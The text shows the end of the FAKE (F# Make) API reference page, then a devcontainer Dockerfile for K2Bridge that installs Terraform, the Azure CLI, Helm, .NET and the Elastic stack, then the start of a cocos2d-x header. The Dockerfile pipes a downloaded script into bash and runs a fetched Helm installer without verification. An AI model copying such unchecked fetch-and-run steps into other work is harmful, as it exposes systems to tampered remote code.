There is also a tutorial about the <a href="../fsc.html">F# compiler tasks</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ftphelper.html">FtpHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to upload a whole folder/specific file into a FTP Server.
Uses <code>Passive Mode</code> FTP and handles all files as binary (and not ASCII).
Assumes direct network connectivity to destination FTP server (not via a proxy).
Does not support FTPS and SFTP.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fxcophelper.html">FxCopHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="http://msdn.microsoft.com/en-us/library/bb429476(v=vs.80).aspx">FxCop</a> on .NET assemblies. There is also a <a href="../fxcop.html">tutorial</a> for this task available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-gachelper.html">GACHelper</a>
</td>
<td class="xmldoc"><p>This module contains helper function for the GAC</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-globbing.html">Globbing</a>
</td>
<td class="xmldoc"><p>This module contains a file pattern globbing implementation.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-htmlhelpworkshophelper.html">HTMLHelpWorkShopHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which allows to use <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms670169(v=vs.85).aspx">HTML Help Workshop</a> in order to compile a help project.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-hipchatnotificationhelper.html">HipChatNotificationHelper</a>
</td>
<td class="xmldoc"><p>Contains a task to send notification messages to a <a href="https://www.hipchat.com/">HipChat</a> room</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-hockeyapphelper.html">HockeyAppHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to interact with <a href="http://hockeyapp.com">HockeyApp</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ilmergehelper.html">ILMergeHelper</a>
</td>
<td class="xmldoc"><p>Contains task a task which allows to merge .NET assemblies with <a href="http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx">ILMerge</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-msbuildhelper.html">MSBuildHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to use MSBuild (or xBuild on Linux/Unix) to build .NET project files or solution files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-msihelper.html">MSIHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to run msiexec in order to install or uninstall msi files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-mstest.html">MSTest</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://en.wikipedia.org/wiki/Visual_Studio_Unit_Testing_Framework/">MSTest</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-mspechelper.html">MSpecHelper</a>
</td>
<td class="xmldoc"><p>Contains a task to run <a href="https://github.com/machine/machine.specifications">machine.specifications</a> tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-magehelper.html">MageHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow FAKE to call the <a href="http://msdn.microsoft.com/en-us/library/acz3y3te.aspx">Manifest Generation and Editing Tool</a>, in short 'MAGE'.
The intentional use is the creation of a clickonce application.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-messagehelper.html">MessageHelper</a>
</td>
<td class="xmldoc"><p>Contains helper function which allow FAKE to interact with other applications via message files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-msbuildlogger.html">MsBuildLogger</a>
</td>
<td class="xmldoc"><p>Contains Logger implementations for MsBuild.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ncoverhelper.html">NCoverHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="http://www.ncover.com/">NCover</a> on .NET assemblies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ndepend.html">NDepend</a>
</td>
<td class="xmldoc"><p>Contains a task which allows to run <a href="http://www.ndepend.com/">NDepend</a> on .NET project files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ngenhelper.html">NGenHelper</a>
</td>
<td class="xmldoc"><p>This module contains helper function for the ngen.exe</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nunitcommon.html">NUnitCommon</a>
</td>
<td class="xmldoc"><p>Contains types and utility functions relaited to running <a href="http://www.nunit.org/">NUnit</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nunitparallel.html">NUnitParallel</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://www.nunit.org/">NUnit</a> unit tests in parallel.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nunitsequential.html">NUnitSequential</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://www.nunit.org/">NUnit</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nunitxml.html">NUnitXml</a>
</td>
<td class="xmldoc"><p>Contains types and functions for working with <a href="http://www.nunit.org/">NUnit</a> unit tests result xml.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-npmhelper.html">NpmHelper</a>
</td>
<td class="xmldoc"><p>Contains function to run npm tasks</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nugethelper.html">NuGetHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions and task which allow to inspect, create and publish <a href="https://www.nuget.org/">NuGet</a> packages.
There is also a tutorial about <a href="../create-nuget-package.html">nuget package creating</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-octotools.html">OctoTools</a>
</td>
<td class="xmldoc"><p>Contains tasks which can be used for automated deployment via <a href="http://octopusdeploy.com/">Octopus Deploy</a>.
There is also a tutorial about the <a href="../octopusdeploy.html">Octopus deployment helper</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-opencoverhelper.html">OpenCoverHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="https://github.com/sawilde/opencover">OpenCover</a> on .NET assemblies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-paket.html">Paket</a>
</td>
<td class="xmldoc"><p>Contains helper functions and task which allow to inspect, create and publish <a href="https://www.nuget.org/">NuGet</a> packages with <a href="http://fsprojects.github.io/Paket/index.html">Paket</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-permissionshelper.html">PermissionsHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow to deal with permissions.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-processhelper.html">ProcessHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which can be used to start other tools.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-processtestrunner.html">ProcessTestRunner</a>
</td>
<td class="xmldoc"><p>Allows to execute processes as unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-rest.html">REST</a>
</td>
<td class="xmldoc"><p>Contains functions to execute typical HTTP/REST calls.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-raygunhelper.html">RaygunHelper</a>
</td>
<td class="xmldoc"><p>Enables deployment tracking using Raygun.io</p>
<p>Thin wrapper around <a href="https://raygun.io/docs/deployments/api">the Raygun HTTP deployment API</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-regasmhelper.html">RegAsmHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run regasm .NET assembly</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-registryhelper.html">RegistryHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow to read and write information from/to the registry.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-releasenoteshelper.html">ReleaseNotesHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to parse Release Notes text files. Either "simple" or "complex" format is accepted.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-reportgeneratorhelper.html">ReportGeneratorHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="https://reportgenerator.codeplex.com">ReportGenerator</a>,
which converts XML reports generated by PartCover, OpenCover or NCover into a readable report in various formats.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-restorepackagehelper.html">RestorePackageHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to restore NuGet packages from a NuGet package feed like <a href="http://www.nuget.org">nuget.org</a>.
There is also a tutorial about <a href="../nuget.html">nuget package restore</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-robocopyhelper.html">RoboCopyHelper</a>
</td>
<td class="xmldoc"><p>Contains a task to use <a href="https://en.wikipedia.org/wiki/Robocopy">robocopy</a> on Windows.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-roundhousehelper.html">RoundhouseHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://projectroundhouse.org/">RoundhousE</a> database migrations.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-scphelper.html">SCPHelper</a>
</td>
<td class="xmldoc"><p>Conatins a task which allows to perform file copies using <a href="http://en.wikipedia.org/wiki/Secure_copy">SCP</a>, which is based on the Secure Shell (SSH) protocol.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-semverhelper.html">SemVerHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to deal with <a href="http://semver.org/">Semantic Versioning</a> (SemVer).</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-servicecontrollerhelpers.html">ServiceControllerHelpers</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to control NT services.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-signhelper.html">SignHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which allows to sign assemblies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-specflowhelper.html">SpecFlowHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which allows to run <a href="http://www.specflow.org/">SpecFlow</a> tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-squirrel.html">Squirrel</a>
</td>
<td class="xmldoc"><p>Contains types and utility functions related to creating <a href="https://github.com/Squirrel/Squirrel.Windows">Squirrel</a> installer.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-stringhelper.html">StringHelper</a>
</td>
<td class="xmldoc"><p>Contains basic functions for string manipulation.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-strongnaminghelper.html">StrongNamingHelper</a>
</td>
<td class="xmldoc"><p>This module contains helper function for Microsoft's sn.exe</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-sxshelper.html">SxsHelper</a>
</td>
<td class="xmldoc"><p>Module that enables creating and embedding Side-by-Side interop
manifests for registration free deployment of Com-.net interop projects</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-targethelper.html">TargetHelper</a>
</td>
<td class="xmldoc"><p>Contains infrastructure code and helper functions for FAKE's target feature.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-taskrunnerhelper.html">TaskRunnerHelper</a>
</td>
<td class="xmldoc"><p>Contains a helper which can be used to implement timeouts and retries.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-teamcityhelper.html">TeamCityHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow FAKE to communicate with a TeamCity agent</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-teamcityresthelper.html">TeamCityRESTHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow FAKE to interact with the <a href="http://confluence.jetbrains.com/display/TCD8/REST+API">TeamCity REST API</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-templatehelper.html">TemplateHelper</a>
</td>
<td class="xmldoc"><p>Contains basic templating functions. Used in other helpers.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-testflighthelper.html">TestFlightHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to upload apps to <a href="http://testflightapp.com">TestFlight</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-tracehelper.html">TraceHelper</a>
</td>
<td class="xmldoc"><p>This module contains function which allow to trace build output</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-tracelistener.html">TraceListener</a>
</td>
<td class="xmldoc"><p>Defines default listeners for build output traces</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-typescript.html">TypeScript</a>
</td>
<td class="xmldoc"><p>Contains code to call the typescript compiler. There is also a <a href="../typescript.html">tutorial</a> for this task available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-unittestcommon.html">UnitTestCommon</a>
</td>
<td class="xmldoc"><p>This module contains types and functions that are common for unit test helpers.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-unittesthelper.html">UnitTestHelper</a>
</td>
<td class="xmldoc"><p>This module contains functions which allow to report unit test results to build servers.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-userinputhelper.html">UserInputHelper</a>
</td>
<td class="xmldoc"><p>This module contains functions which allow to interactively input values</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-vsshelper.html">VSSHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions for <a href="http://en.wikipedia.org/wiki/Microsoft_Visual_SourceSafe">Microsoft Visual SourceSafe</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-vstest.html">VSTest</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="https://msdn.microsoft.com/en-us/library/ms182486.aspx">VSTest</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-vb6helper.html">Vb6Helper</a>
</td>
<td class="xmldoc"><p>Enables building of Visual Basic 6 projects
Also includes a do-it-all function that will embed interop
side-by-side manifest to executables from Vb6 using
functions from the Side-by-side helper module</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-versionhelper.html">VersionHelper</a>
</td>
<td class="xmldoc"></td>
</tr>
<tr>
<td class="module-name">
<a href="fake-wixhelper.html">WiXHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to create msi installers using the <a href="http://wixtoolset.org/">WiX toolset</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xcopyhelper.html">XCopyHelper</a>
</td>
<td class="xmldoc"><p>Contains a task to use <a href="http://en.wikipedia.org/wiki/XCOPY">XCOPY</a> on Windows.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xdthelper.html">XDTHelper</a>
</td>
<td class="xmldoc"><p>Contains functions used to transform config (or any XML) files using Microsoft's XML Document Transformations.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xmlhelper.html">XMLHelper</a>
</td>
<td class="xmldoc"><p>Contains functions to read and write XML files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xunit2helper.html">XUnit2Helper</a>
</td>
<td class="xmldoc"><p>DEPRECATED. See <a href="fake-testing-xunit2.html"><code>Fake.Testing.XUnit2</code></a>.</p>
<p>Contains tasks to run <a href="https://github.com/xunit/xunit">xUnit</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xunithelper.html">XUnitHelper</a>
</td>
<td class="xmldoc"><p>DEPRECATED. See <a href="fake-testing-xunit.html"><code>Fake.Testing.XUnit</code></a>.</p>
<p>Contains tasks to run <a href="https://github.com/xunit/xunit">xUnit</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xamarinhelper.html">XamarinHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks for building Xamarin.iOS and Xamarin.Android apps</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xpkghelper.html">XpkgHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to create packages in <a href="http://components.xamarin.com/">Xamarin's xpkg format</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ziphelper.html">ZipHelper</a>
</td>
<td class="xmldoc"><p>This module contains helper function to create and extract zip archives.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.Azure Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-azure-cloudservices.html">CloudServices</a>
</td>
<td class="xmldoc"><p>Contains tasks to package Azure Cloud Services.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-azure-webjobs.html">WebJobs</a>
</td>
<td class="xmldoc"><p>Contains tasks to package and deploy <a href="http://azure.microsoft.com/en-gb/documentation/articles/web-sites-create-web-jobs/">Azure Web Jobs</a> via the <a href="https://github.com/projectkudu/kudu">Kudu</a> Zip controller</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.CMakeSupport Namespace</h2>
<div>
<table class="table table-bordered type-list">
<thead>
<tr><td>Type</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="type-name">
<a href="fake-cmakesupport-cmakebuildparams.html">CMakeBuildParams</a>
</td>
<td class="xmldoc"><p>The CMakeBuild parameter type.</p>
</td>
</tr>
<tr>
<td class="type-name">
<a href="fake-cmakesupport-cmakegenerateparams.html">CMakeGenerateParams</a>
</td>
<td class="xmldoc"><p>The CMakeGenerate parameter type.</p>
</td>
</tr>
<tr>
<td class="type-name">
<a href="fake-cmakesupport-cmakevalue.html">CMakeValue</a>
</td>
<td class="xmldoc"><p>The possible variable value types for CMake variables.</p>
</td>
</tr>
<tr>
<td class="type-name">
<a href="fake-cmakesupport-cmakevariable.html">CMakeVariable</a>
</td>
<td class="xmldoc"><p>A CMake variable.</p>
</td>
</tr>
</tbody>
</table>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-cmakesupport-cmake.html">CMake</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to use CMake to build CMakeLists files.
See <code>Samples/CMakeSupport</code> for usage examples.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.Git Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-git-branches.html">Branches</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git branches.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-commandhelper.html">CommandHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to interact with <a href="http://git-scm.com/">git</a> via the command line.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-commit.html">Commit</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to commit to git repositories.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-commitmessage.html">CommitMessage</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to get and set the git commit message.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-filestatus.html">FileStatus</a>
</td>
<td class="xmldoc"><p>Contains helper functions which can be used to retrieve file status information from git.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-information.html">Information</a>
</td>
<td class="xmldoc"><p>Contains helper functions which can be used to retrieve status information from git.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-merge.html">Merge</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git merge.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-rebase.html">Rebase</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git rebase.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-repository.html">Repository</a>
</td>
<td class="xmldoc"><p>Contains functions which allow basic operations on git repositories.
All operations assume that the CommandHelper can find git.exe.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-reset.html">Reset</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git reset.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-sha1.html">SHA1</a>
</td>
<td class="xmldoc"><p>Contains functions which allow the SHA1 of a file with git and without it.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-sanitychecks.html">SanityChecks</a>
</td>
<td class="xmldoc"><p>Contains helper function which can be used for sanity checks.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-staging.html">Staging</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git's staging area.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-stash.html">Stash</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git stash.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-submodule.html">Submodule</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git submodules.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.MSBuild Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-msbuild-projectsystem.html">ProjectSystem</a>
</td>
<td class="xmldoc"><p>Contains project file comparion tools for MSBuild project files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-msbuild-specsremovement.html">SpecsRemovement</a>
</td>
<td class="xmldoc"><p>Contains functions which allow to remove side-by-side specs during the build.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.NuGet Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-nuget-install.html">Install</a>
</td>
<td class="xmldoc"><p>Contains tasks for installing NuGet packages using the <a href="http://docs.nuget.org/docs/reference/command-line-reference#Install_Command">nuget.exe install command</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nuget-update.html">Update</a>
</td>
<td class="xmldoc"><p>Contains tasks for updating NuGet packages including assembly hint paths in the project files using the <a href="http://docs.nuget.org/docs/reference/command-line-reference#Update_Command">nuget.exe update command</a>.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.Testing Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-testing-xunit.html">XUnit</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="https://github.com/xunit/xunit">xUnit</a> v1 unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-testing-xunit2.html">XUnit2</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="https://github.com/xunit/xunit">xUnit</a> v2 unit tests.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Test.FAKECore Namespace</h2>
<div>
<table class="table table-bordered type-list">
<thead>
<tr><td>Type</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="type-name">
<a href="test-fakecore-fsharpfuncutil.html">FSharpFuncUtil</a>
</td>
<td class="xmldoc"></td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="span3">
<a href="http://fsharp.github.io/FAKE/index.html">
<img src="http://fsharp.github.io/FAKE/pics/logo.png" style="width:140px;height:140px;margin:10px 0px 0px 35px;border-style:none;" />
</a>
<ul class="nav nav-list" id="menu">
<li class="nav-header">FAKE - F# Make</li>
<li class="divider"></li>
<li><a href="http://fsharp.github.io/FAKE/index.html">Home page</a></li>
<li class="divider"></li>
<li><a href="https://www.nuget.org/packages/FAKE">Get FAKE - F# Make via NuGet</a></li>
<li><a href="http://github.com/fsharp/fake">Source Code on GitHub</a></li>
<li><a href="http://github.com/fsharp/fake/blob/master/License.txt">License (Apache 2)</a></li>
<li><a href="http://fsharp.github.io/FAKE/RELEASE_NOTES.html">Release Notes</a></li>
<li><a href="http://fsharp.github.io/FAKE//contributing.html">Contributing to FAKE - F# Make</a></li>
<li><a href="http://fsharp.github.io/FAKE/users.html">Who is using FAKE?</a></li>
<li><a href="http://stackoverflow.com/questions/tagged/f%23-fake">Ask a question</a></li>
<li class="nav-header">Tutorials</li>
<li><a href="http://fsharp.github.io/FAKE/gettingstarted.html">Getting started</a></li>
<li><a href="http://fsharp.github.io/FAKE/cache.html">Build script caching</a></li>
<li class="divider"></li>
<li><a href="http://fsharp.github.io/FAKE/nuget.html">NuGet package restore</a></li>
<li><a href="http://fsharp.github.io/FAKE/fxcop.html">Using FxCop in a build</a></li>
<li><a href="http://fsharp.github.io/FAKE/assemblyinfo.html">Generating AssemblyInfo</a></li>
<li><a href="http://fsharp.github.io/FAKE/create-nuget-package.html">Create NuGet packages</a></li>
<li><a href="http://fsharp.github.io/FAKE/specifictargets.html">Running specific targets</a></li>
<li><a href="http://fsharp.github.io/FAKE/commandline.html">Running FAKE from command line</a></li>
<li><a href="http://fsharp.github.io/FAKE/parallel-build.html">Running targets in parallel</a></li>
<li><a href="http://fsharp.github.io/FAKE/fsc.html">Using the F# compiler from FAKE</a></li>
<li><a href="http://fsharp.github.io/FAKE/customtasks.html">Creating custom tasks</a></li>
<li><a href="http://fsharp.github.io/FAKE/soft-dependencies.html">Soft dependencies</a></li>
<li><a href="http://fsharp.github.io/FAKE/teamcity.html">TeamCity integration</a></li>
<li><a href="http://fsharp.github.io/FAKE/canopy.html">Running canopy tests</a></li>
<li><a href="http://fsharp.github.io/FAKE/octopusdeploy.html">Octopus Deploy</a></li>
<li><a href="http://fsharp.github.io/FAKE/typescript.html">TypeScript support</a></li>
<li><a href="http://fsharp.github.io/FAKE/azurewebjobs.html">Azure WebJobs support</a></li>
<li><a href="http://fsharp.github.io/FAKE/azurecloudservices.html">Azure Cloud Services support</a></li>
<li><a href="http://fsharp.github.io/FAKE/fluentmigrator.html">FluentMigrator support</a></li>
<li><a href="http://fsharp.github.io/FAKE/androidpublisher.html">Android publisher</a></li>
<li><a href="http://fsharp.github.io/FAKE/watch.html">File Watcher</a></li>
<li class="divider"></li>
<li><a href="http://fsharp.github.io/FAKE/deploy.html">Fake.Deploy</a></li>
<li><a href="http://fsharp.github.io/FAKE/iis.html">Fake.IIS</a></li>
<li class="nav-header">Reference</li>
<li><a href="http://fsharp.github.io/FAKE/apidocs/index.html">API Reference</a></li>
</ul>
</div>
</div>
</div>
<a href="http://github.com/fsharp/fake"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_right_gray_6d6d6d.png" alt="Fork me on GitHub"></a>
</body>
</html>
| raphaelmesquita/KataTennis |
<|start_filename|>.devcontainer/Dockerfile<|end_filename|>
FROM mcr.microsoft.com/vscode/devcontainers/base:0-ubuntu20.04
ARG BUILD_ELASTIC_STACK_VERSION="6.8.20"
ARG BUILD_TERRAFORM_VERSION="1.0.9"
# Update & Install Open JDK
RUN apt-get update && apt-get upgrade -y && apt-get install -y default-jre
# Install Terraform
ENV TERRAFORM_VERSION=${BUILD_TERRAFORM_VERSION}
RUN curl -Os https://releases.hashicorp.com/terraform/${TERRAFORM_VERSION}/terraform_${TERRAFORM_VERSION}_linux_amd64.zip && \
unzip -o terraform_${TERRAFORM_VERSION}_linux_amd64.zip -d /usr/local/bin
RUN rm terraform_${TERRAFORM_VERSION}_linux_amd64.zip
# Install Azure CLI
RUN curl -sL https://aka.ms/InstallAzureCLIDeb | bash
# Install Helm
RUN curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3
RUN chmod 700 get_helm.sh
RUN ./get_helm.sh
# Install .NET SDK
RUN wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
RUN dpkg -i packages-microsoft-prod.deb
RUN rm packages-microsoft-prod.deb
RUN apt-get update && \
apt-get install -y dotnet-sdk-3.1 dotnet-sdk-5.0
# Set current working directory to /home/vscode
USER vscode
ENV HOME=/home/vscode
WORKDIR $HOME
# Install ElasticSearch
ENV ELASTIC_STACK_VERSION=${BUILD_ELASTIC_STACK_VERSION}
RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz
RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz.sha512
RUN shasum -a 512 -c elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz.sha512
RUN tar -xzf elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz
RUN rm elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz
RUN rm elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz.sha512
# Install Kibana
RUN wget https://artifacts.elastic.co/downloads/kibana/kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz
RUN wget https://artifacts.elastic.co/downloads/kibana/kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz.sha512
RUN shasum -a 512 -c kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz.sha512
RUN tar -xzf kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz
RUN rm kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz
RUN rm kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz.sha512
CMD [ "sleep", "infinity" ] | dupuyjs/K2Bridge |
<|start_filename|>cocos2dx/actions/CCActionCamera.h<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright (c) 2008-2010 <NAME>
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
